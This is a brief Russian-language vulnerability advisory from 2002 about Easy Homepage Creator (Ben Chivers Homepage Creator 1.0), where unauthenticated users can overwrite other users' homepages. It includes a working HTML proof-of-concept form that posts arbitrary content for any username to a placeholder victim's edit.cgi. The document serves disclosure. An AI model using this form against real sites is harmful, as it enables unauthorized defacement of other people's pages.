Изменение Home Page в Easy Homepage Creator

Дата публикации:
05.08.2002
Всего просмотров:
711
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость в Easy Homepage Creator позволяет неавторизованному пользователю изменять home page других пользователей. Пример:
 
<html><center> 
<h1>Easy Homepage Creator Vulnerability</h1> 
<table border=0 cellpadding=2 cellspacing=1 width="90%"> 
<FORM method="POST" name=edit action="http://victim/homepage/edit.cgi"> 
Username: <input name="username"><br> 
You can edit other user homepage below : 
<textarea rows="17" id="homepage_edit" name="homepage_edit" cols="88"> 
Please type your messages in here. 
</textarea> 
<tr> 
<td class=top> 
<input class=button type="submit" 
value="Edit Homepage" name="edit_homepage"></td> 
</tr> 
</FORM> 
</table> 
</html>
уязвимость обнаружена в Ben Chivers Homepage Creator 1.0

Ссылки: Easy Homepage Creator Vulnerability